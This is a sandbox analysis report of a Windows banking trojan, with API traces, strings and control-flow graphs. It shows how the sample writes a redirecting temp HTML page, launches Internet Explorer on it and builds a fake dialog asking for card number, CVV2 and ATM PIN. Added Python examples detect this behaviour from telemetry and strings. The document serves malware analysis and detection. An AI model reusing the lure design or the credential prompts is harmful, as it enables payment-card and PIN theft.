                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
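The call sequence above is the launcher side of the lure: a throw-away .htm is written under the temp directory (the 0040570C subcall), then CreateProcessA runs a command line built by strcat as "<IE path>\Iexplore.exe " plus that file, and the code polls FindWindowA("IEFrame", "MicroSoft-Corp<N> - Microsoft Internet Explorer") before copying the page, checking it starts with "<HTML><!--", deleting it and terminating the browser. That sequence is detectable from endpoint telemetry alone. The Python below is an added example written for this page, not code from the report or the sample: it correlates Sysmon-style FileCreate and ProcessCreate records and flags iexplore.exe being started on a Temp .htm by a non-shell parent, raising severity when that same parent wrote the file moments earlier. The events, field names, timestamps and the dropper file name are constructed placeholders (the report only shows that the dropped executable lives under C:\Windows), and the unquoted command line mirrors the strcat construction the report lists.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style events for this example (not taken from the report).
# Layout follows the report's call sequence: a .htm written under %TEMP%
# (GetTempPathA + CreateFileA), then CreateProcessA on the unquoted command line
# "<IE install path>\Iexplore.exe <temp file>" built with strcat.
# The dropper file name is a placeholder, not a name taken from the report.
EVENTS: List[Dict] = [
    {"t": 100.0, "type": "FileCreate", "pid": 4242,
     "image": r"C:\Windows\dropper_placeholder.exe",
     "path": r"C:\Users\user\AppData\Local\Temp\x1f3.htm"},
    {"t": 100.4, "type": "ProcessCreate", "pid": 5100, "ppid": 4242,
     "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "parent_image": r"C:\Windows\dropper_placeholder.exe",
     "cmdline": r"C:\Program Files\Internet Explorer\Iexplore.exe "
                r"C:\Users\user\AppData\Local\Temp\x1f3.htm"},
    # Benign control: the user opens a saved page from Explorer.
    {"t": 200.0, "type": "ProcessCreate", "pid": 5200, "ppid": 1000,
     "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Program Files\Internet Explorer\iexplore.exe" '
                r"C:\Users\user\Documents\notes.htm"},
]

# A .htm argument that lives under a Temp directory. The path part must not
# contain whitespace, which is what lets the unquoted form be split correctly.
TEMP_HTM_RE = re.compile(r'([A-Za-z]:\\[^\s"]*\\Temp\\[^\s"]*\.htm)\b', re.I)

# Parents for which IE opening a local .htm is normal.
SHELL_PARENTS = {"explorer.exe", "iexplore.exe"}


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_ie_temp_htm_launch(events: List[Dict], window_s: float = 30.0) -> List[Dict]:
    """Flag iexplore.exe started on a Temp .htm by a non-shell parent; raise the
    severity when the same parent process wrote that file within window_s."""
    alerts: List[Dict] = []
    recent_htm: Dict[str, Dict] = {}          # lowercase path -> FileCreate event
    for ev in sorted(events, key=lambda e: e["t"]):
        if ev["type"] == "FileCreate" and ev["path"].lower().endswith(".htm"):
            recent_htm[ev["path"].lower()] = ev
            continue
        if ev["type"] != "ProcessCreate" or _base(ev["image"]) != "iexplore.exe":
            continue
        m = TEMP_HTM_RE.search(ev["cmdline"])
        if not m or _base(ev["parent_image"]) in SHELL_PARENTS:
            continue
        page = m.group(1)
        writer = recent_htm.get(page.lower())
        same_writer = (writer is not None and writer["pid"] == ev["ppid"]
                       and 0 <= ev["t"] - writer["t"] <= window_s)
        alerts.append({
            "pid": ev["pid"],
            "parent": ev["parent_image"],
            "page": page,
            "severity": "high" if same_writer else "medium",
            "reason": ("parent wrote the page and then launched IE on it"
                       if same_writer else
                       "IE launched on a Temp .htm by a non-shell parent"),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_ie_temp_htm_launch(EVENTS):
        print(alert)
```

The FileCreate correlation is what separates this sample's behaviour from a user double-clicking a saved page: the same process that wrote the .htm is the parent of the browser. A production rule would add the title the report shows the code waiting for ("MicroSoft-Corp<N> - Microsoft Internet Explorer") from window-title telemetry where it is available, and would key on the IE path read from the "Software\Microsoft\IE Setup\Setup" "Path" value rather than the hard-coded directory used here.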
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D
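The CreateWindowExA and SendMessageA arguments above are the whole lure: a window of class "QueenKarton" carrying STATIC labels for card number, expiry, CVV2 and ATM PIN, two COMBOBOX controls seeded with "MasterCard" and "Visa", and a "Click Once To Continue" button, all subclassed through SetWindowLongA. Those literals are stable across copies of the dialog code and make a good static signature. The Python below is an added example written for this page, not code from the report or the sample: it evaluates a YARA-style rule (window class present, at least three of the form labels, at least one card brand) over a byte buffer, in both ANSI and UTF-16LE form. The buffers are constructed here from the strings the report lists; they are not dumps from the sample, and the UTF-16LE check is an assumption added for builds that may use wide strings.

```python
from typing import Dict, List

# Strings the report lists for the dialog-building function, grouped the way a
# YARA rule would group them ($class, $label*, $brand*).
WINDOW_CLASS = [b"QueenKarton"]
FORM_LABELS = [
    b"Your card number",
    b"Card && expiration date",
    b"3-digit validation code on back of card (cvv2)",
    b"ATM PIN-Code",
    b"Unable to authorize. ATM PIN-Code is required to complete the transaction.",
    b"Please make corrections and try again.",
    b"Click Once To Continue",
    b"Authorization Failed.",
]
CARD_BRANDS = [b"MasterCard", b"Visa"]


def _hits(buf: bytes, needles: List[bytes]) -> List[bytes]:
    """Return the needles present in buf as ANSI bytes (what the A-suffixed APIs
    in the report consume) or as UTF-16LE (assumed variant, not seen in the report)."""
    found = []
    for needle in needles:
        wide = needle.decode("ascii").encode("utf-16-le")
        if needle in buf or wide in buf:
            found.append(needle)
    return found


def evaluate(buf: bytes, min_labels: int = 3) -> Dict[str, object]:
    """YARA-style condition: $class and (min_labels of $label*) and any of $brand*.
    Requiring several labels keeps a legitimate payment form with one or two of
    these phrases from matching."""
    cls = _hits(buf, WINDOW_CLASS)
    labels = _hits(buf, FORM_LABELS)
    brands = _hits(buf, CARD_BRANDS)
    matched = bool(cls) and len(labels) >= min_labels and bool(brands)
    return {"match": matched, "class": cls, "labels": labels, "brands": brands}


# Constructed stand-in for a slice of the unpacked image: the report's strings
# separated by filler bytes (not a memory dump from the sample).
SAMPLE_BLOB = b"\x00" * 8 + b"\x00".join([
    b"STATIC", b"QueenKarton", b"MasterCard", b"Visa", b"Your card number",
    b"ATM PIN-Code", b"3-digit validation code on back of card (cvv2)",
]) + b"\xcc" * 8

# Constructed benign control: a checkout page that shares two phrases but has
# neither the window class nor enough of the labels.
BENIGN_BLOB = b"Pay with Visa\x00Your card number\x00Thank you for your order\x00"


if __name__ == "__main__":
    print(evaluate(SAMPLE_BLOB))
    print(evaluate(BENIGN_BLOB))
```

The three groups translate one-to-one into a YARA rule with strings `$class`, `$label1..$label8` and `$brand1..$brand2` and the condition `$class and 3 of ($label*) and any of ($brand*)`; the Python form is here so the thresholds can be tuned against real corpora before the rule is deployed.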

                            Control-flow Graph

                            control_flow_graph 310 40570c-405743 call 4079e4 GetTempPathA 313 405746-40574b 310->313 313->313 314 40574d-405796 call 4015ea strcat sprintf rand 313->314 317 405798-4057a9 strcat 314->317 318 4057ac-4057bc rand 314->318 317->318 319 4057e7-4057f7 rand 318->319 320 4057be-4057e4 rand sprintf 318->320 321 4057f9-40580a strcat 319->321 322 40580d-405837 strcat rand 319->322 320->319 321->322 323 405839-40584a strcat 322->323 324 40584d-40585d rand 322->324 323->324 325 405888-4058c1 sprintf rand 324->325 326 40585f-405885 rand sprintf 324->326 327 4058c3-4058d4 strcat 325->327 328 4058d7-4058fb strcat rand 325->328 326->325 327->328 329 405911-40593b strcat rand 328->329 330 4058fd-40590e strcat 328->330 331 405966-40598a strcat rand 329->331 332 40593d-405963 rand sprintf 329->332 330->329 333 4059a0-4059d0 strcat rand 331->333 334 40598c-40599d strcat 331->334 332->331 335 4059d2-4059e3 strcat 333->335 336 4059e6-405a0a strcat rand 333->336 334->333 335->336 337 405a20-405a5a sprintf rand 336->337 338 405a0c-405a1d strcat 336->338 339 405a70-405a9a strcat rand 337->339 340 405a5c-405a6d strcat 337->340 338->337 341 405ab0-405af1 rand sprintf rand 339->341 342 405a9c-405aad strcat 339->342 340->339 343 405af3-405b04 strcat 341->343 344 405b07-405b37 strcat rand 341->344 342->341 343->344 345 405b39-405b4a strcat 344->345 346 405b4d-405b5d rand 344->346 345->346 347 405b88-405c08 strcat CreateFileA lstrlenA WriteFile CloseHandle 346->347 348 405b5f-405b85 rand sprintf 346->348 348->347
                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE

                            Control-flow Graph (graph image not reproduced; the executed / not-executed colouring is lost, the block and edge list is kept below)

                            control_flow_graph 382 4068b0-4068c1 383 4068c7-4068e1 call 405f5b 382->383 386 4068e7-40690f call 403619 383->386 387 406c0c-406c1d _sleep 383->387 390 406be1-406bfb call 4043bf 386->390 391 406915 386->391 387->383 394 406c01-406c07 LocalFree 390->394 395 40691a-406921 390->395 391->387 394->387 395->390 396 406927-40692e 395->396 397 406934-40693b 396->397 398 406a66-406a7e call 40143b 396->398 397->398 400 406941-406970 sscanf 397->400 398->390 404 406a84-406aa7 atoi 398->404 402 406972-406995 rand 400->402 403 40699b-4069a2 400->403 402->390 402->403 405 4069a4-4069d9 sprintf * 2 403->405 406 4069db-406a24 GetWindowsDirectoryA sprintf strcat 403->406 404->390 407 406aad-406aef sprintf call 407a04 lstrlenA 404->407 408 406a27-406a61 DeleteFileA sprintf WinExec 405->408 406->408 411 406b17-406b1e 407->411 412 406b20-406bdc sprintf lstrlenA * 2 LocalAlloc call 407a04 lstrlenA call 407a04 CreateThread CloseHandle 411->412 413 406af1-406aff 411->413 412->390 414 406b11 413->414 415 406b01-406b0f 413->415 414->411 415->412
                            APIs
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?), ref: 00405F73
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,?), ref: 00405F7E
                              • Part of subcall function 00405F5B: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F5B: DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                              • Part of subcall function 00405F5B: CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                              • Part of subcall function 00405F5B: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                              • Part of subcall function 00405F5B: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                              • Part of subcall function 00405F5B: CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            • sscanf.CRTDLL(0000003A,:%02u,?), ref: 0040695B
                            • rand.CRTDLL ref: 00406972
                            • sprintf.CRTDLL(?,%s\cmd.pif,00429080), ref: 004069B5
                            • sprintf.CRTDLL(?,%s\cmd.exe,00429080,?,%s\cmd.pif,00429080), ref: 004069D1
                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 004069E7
                            • sprintf.CRTDLL(?,%s\command.pif,?,?,00000400), ref: 00406A0E
                            • strcat.CRTDLL(?,\command.com,?,%s\command.pif,?,?,00000400), ref: 00406A1F
                            • DeleteFileA.KERNEL32(?,?,?,?,?,00000400), ref: 00406A2E
